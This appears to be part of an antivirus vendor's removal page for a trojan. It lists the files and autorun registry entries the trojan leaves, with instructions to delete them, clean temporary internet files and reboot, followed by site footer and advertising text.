%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmswmanagerplugins\BDMSWManagerView.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDALeakfixer.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOCleanerPlugin.dll (15801 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\2015604100\Setting\host.dat (306 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_extlist.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMNetMonMgrDll.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerConfig.dat (6 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\StartupDict.dat (1783 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\RtpContainerConfig.xml (474 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMPatchAgent.dll (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[2].js (6467 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[2].js (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\selected_page[1].html (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (6022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\selected_page[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[2].jpg (2563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAJQTKHL.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[13].jpg (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\openicon[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\select-normal[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[2].jpg (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[10].jpg (3658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\banner-kingston-20140815[1].jpg (27043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[2].js (3574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[2].jpg (4640 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[5].jpg (4787 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.fengyunzhibo[1].xml (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1] (1850 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\nav-bk[1].png (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery-1.8.3.min[1].js (62713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\user-icon[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\gameicon_s[1].png (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\default_avatar_s[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[2].js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[2].css (1361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\select-deep[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1].htm (2358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[4].jpg (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[4].jpg (1144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\QQÃƒÂÃ‚Â¼Ãƒâ€ Ã‚Â¬20140316001047[1].jpg (30227 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[2].js (3255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[3].jpg (585 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[1].jpg (1511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[2].js (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (2827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[1].jpg (2274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[9].jpg (4187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[1].jpg (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[3].js (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v3[1].png (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[2].js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[4].jpg (3347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v4[1].js (10653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[3].jpg (5088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[12].jpg (3048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[2].css (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[1].jpg (1384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[3].jpg (1176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\loading[1].gif (8152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-v4[1].css (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[7].jpg (1974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[11].jpg (2814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\zhibo2[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[6].jpg (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\header-v3-media[1].css (612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\fystat.min[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\sporticon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\stat[1].php (4386 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (1186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[4].jpg (3096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\c[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[8].jpg (1977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[2].js (660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\home-v3[1].png (15800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[5].jpg (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (1761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[2].js (817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\json2[1].js (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[2].js (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[2].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\1pc[1].png (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[3].jpg (42 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (1758 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[5].jpg (2336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hyyy_ban[1].png (38404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\cover_bk[1].png (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CAEJCPMJ.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\artsicon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\system[1].js (1561 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\banner_bk[1].png (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[2].jpg (3371 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_2014081705" = "%Program Files%\yyfm0529\2014081705\yymusic05.exe -mini"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_News_2014081705" = "%Program Files%\yyfm0529\2014081705\YFMSever.exe -mini"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe -stmd=3"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.GenericKD.1780278_fb4f8f36fd

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.GenericKD.1780278_fb4f8f36fd

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet